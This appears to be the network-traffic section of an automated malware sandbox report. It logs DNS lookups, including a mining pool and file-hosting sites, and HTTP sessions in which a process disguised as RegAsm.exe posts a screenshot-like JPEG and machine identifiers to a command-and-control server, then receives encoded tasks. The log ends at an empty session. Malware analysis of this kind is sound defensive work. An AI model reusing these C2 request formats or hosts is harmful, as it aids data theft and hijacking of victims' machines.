Aug 31, 2024 22:41:57.823249102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823267937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823280096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823303938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823317051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823340893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823354959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823376894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823398113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823412895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823435068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823460102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823482037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823503017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823523998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823537111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823561907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823581934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823591948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823612928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823632956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823652029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823678017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823694944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823719025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823736906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823760986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823775053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823797941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823816061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823823929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823848009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823858976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823879957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823895931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823910952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823930979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823944092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823966026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.823983908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824001074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824013948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824038029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824055910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824074030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824086905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824107885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824121952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824141979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824152946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824174881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824188948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824208975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824229956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824243069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824266911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824290991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824305058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824326038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824340105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824358940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824377060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824395895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824413061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824425936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824445009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824465036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824476957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824495077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824510098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824532986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824553013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824565887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824588060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824600935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824621916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824630976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824652910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824661970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824685097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824698925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824721098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824733973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824750900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824774981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824789047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824810028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824830055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824843884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824862957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824887037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824894905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824915886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824924946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824947119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824960947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.824982882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825002909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825020075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825032949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825057983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825074911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825089931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825110912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825125933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825144053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825160980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825176001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825192928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825207949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825227976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825247049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825263023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825284004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825294971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825319052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825331926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825352907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825370073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825390100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825408936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825427055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825434923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825459003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825474977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825496912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825511932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825531006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825541019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825565100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825577974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825599909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825613976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825633049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.825651884 CEST	49732	80	192.168.2.4	185.215.113.19

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 31, 2024 22:41:58.570966005 CEST	192.168.2.4	1.1.1.1	0x5fec	Standard query (0)	2x.si	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:06.014345884 CEST	192.168.2.4	1.1.1.1	0x2f89	Standard query (0)	tmpfiles.org	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:07.760018110 CEST	192.168.2.4	1.1.1.1	0x53d1	Standard query (0)	fusionflow-meta.net	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:18.314610004 CEST	192.168.2.4	1.1.1.1	0x6c30	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:28.527287006 CEST	192.168.2.4	1.1.1.1	0x4802	Standard query (0)	exonic-hacks.com	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:34.080249071 CEST	192.168.2.4	1.1.1.1	0xabe9	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:35.202266932 CEST	192.168.2.4	1.1.1.1	0x4e7b	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:47.378874063 CEST	192.168.2.4	1.1.1.1	0xc1ce	Standard query (0)	rx.unmineable.com	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:43:40.884259939 CEST	192.168.2.4	1.1.1.1	0x6268	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 31, 2024 22:41:58.586218119 CEST	1.1.1.1	192.168.2.4	0x5fec	No error (0)	2x.si		172.67.143.156	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:41:58.586218119 CEST	1.1.1.1	192.168.2.4	0x5fec	No error (0)	2x.si		104.21.27.222	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:06.024511099 CEST	1.1.1.1	192.168.2.4	0x2f89	No error (0)	tmpfiles.org		104.21.21.16	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:06.024511099 CEST	1.1.1.1	192.168.2.4	0x2f89	No error (0)	tmpfiles.org		172.67.195.247	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:07.796138048 CEST	1.1.1.1	192.168.2.4	0x53d1	No error (0)	fusionflow-meta.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:07.796138048 CEST	1.1.1.1	192.168.2.4	0x53d1	No error (0)	fusionflow-meta.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:18.322119951 CEST	1.1.1.1	192.168.2.4	0x6c30	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:28.684897900 CEST	1.1.1.1	192.168.2.4	0x4802	No error (0)	exonic-hacks.com		185.216.214.225	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:34.087112904 CEST	1.1.1.1	192.168.2.4	0xabe9	No error (0)	github.com		140.82.121.4	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:35.209171057 CEST	1.1.1.1	192.168.2.4	0x4e7b	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:35.209171057 CEST	1.1.1.1	192.168.2.4	0x4e7b	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:35.209171057 CEST	1.1.1.1	192.168.2.4	0x4e7b	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:35.209171057 CEST	1.1.1.1	192.168.2.4	0x4e7b	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:42:47.414128065 CEST	1.1.1.1	192.168.2.4	0xc1ce	No error (0)	rx.unmineable.com	rx.unminable.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 22:42:47.414128065 CEST	1.1.1.1	192.168.2.4	0xc1ce	No error (0)	rx.unminable.com	rx-eu.unminable.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 22:42:47.414128065 CEST	1.1.1.1	192.168.2.4	0xc1ce	No error (0)	rx-eu.unminable.com	rx-eu-lon.unminable.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 22:42:47.414128065 CEST	1.1.1.1	192.168.2.4	0xc1ce	No error (0)	rx-eu-lon.unminable.com		161.35.34.195	A (IP address)	IN (0x0001)	false
Aug 31, 2024 22:43:40.891550064 CEST	1.1.1.1	192.168.2.4	0x6268	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:41:57.339180946 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:41:58.177508116 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:41:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:41:58.180535078 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:41:58.542474031 CEST	632	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:41:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 62 39 0d 0a 20 3c 63 3e 31 30 30 30 32 36 37 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 31 38 37 62 39 34 30 33 33 31 62 31 64 61 62 66 65 35 38 38 33 65 66 66 38 34 37 36 30 35 62 34 66 39 23 31 30 30 30 32 36 38 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 35 31 36 65 39 34 31 64 33 62 66 63 64 61 66 65 62 64 39 32 32 35 66 63 64 63 36 62 34 65 66 64 61 61 37 61 36 31 35 61 38 65 38 34 61 32 31 39 31 61 61 64 36 35 66 39 30 34 33 61 30 34 23 31 30 30 30 32 37 31 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 31 38 37 62 39 34 30 33 37 37 61 34 38 34 61 61 65 35 63 62 36 65 62 65 63 33 33 37 31 32 61 62 62 33 33 31 36 34 31 62 64 63 39 39 66 39 34 35 35 65 65 39 32 62 65 32 34 65 32 65 30 65 39 32 30 35 61 61 66 37 37 66 38 64 23 31 30 30 30 32 37 32 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 31 38 37 62 39 34 30 33 37 37 61 34 38 34 61 61 65 35 63 62 36 65 62 65 63 33 33 37 31 32 61 62 62 33 33 31 36 34 31 62 64 63 39 39 66 39 34 35 35 65 65 62 32 61 65 31 34 65 32 35 30 65 39 31 30 62 65 38 66 37 37 32 [TRUNCATED] Data Ascii: 1b9 <c>1000267001+++97289d03187b940331b1dabfe5883eff847605b4f9#1000268001+++97289d03516e941d3bfcdafebd9225fcdc6b4efdaa7a615a8e84a2191aad65f9043a04#1000271001+++97289d03187b940377a484aae5cb6ebec33712abb331641bdc99f9455ee92be24e2e0e9205aaf77f8d#1000272001+++97289d03187b940377a484aae5cb6ebec33712abb331641bdc99f9455eeb2ae14e250e910be8f772980c277bb607091663#1000277001+++97289d03516e941d3bfcdafebd9225fcdc6b4efdaa7a615a8e84a6061cbf70a04f27199b#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:41:57.348808050 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTA0ODI4 Host: 185.215.113.19 Content-Length: 104980 Cache-Control: no-cache
Aug 31, 2024 22:41:57.348808050 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 30 4f 44 49 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTA0ODI4Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:41:57.348808050 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:41:57.348808050 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:41:57.348808050 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:41:57.348808050 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:41:57.348809004 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:41:57.348809004 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:41:57.348829985 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:41:57.348829985 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:41:57.348829985 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:41:59.110428095 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:41:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:41:59.110876083 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:41:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:41:59.338248968 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTg4NDk= Host: 185.215.113.19 Content-Length: 99001 Cache-Control: no-cache
Aug 31, 2024 22:41:59.338248968 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 67 34 4e 44 6b 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTg4NDk=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:41:59.338355064 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:41:59.338356018 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:41:59.338356018 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:41:59.338426113 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:41:59.338426113 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:41:59.338426113 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:41:59.338481903 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:41:59.338481903 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:41:59.338481903 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:01.329412937 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:01.273835897 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000267001&unit=246122658369
Aug 31, 2024 22:42:02.174582958 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:01.754420042 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAwNzE0 Host: 185.215.113.19 Content-Length: 100866 Cache-Control: no-cache
Aug 31, 2024 22:42:01.754420042 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 77 4e 7a 45 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAwNzE0Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:01.754589081 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:01.754589081 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:01.754589081 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:01.754589081 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:01.754770041 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:01.754770041 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:01.754770041 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:01.754770041 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:01.754858017 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:04.124469042 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	185.215.113.16	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
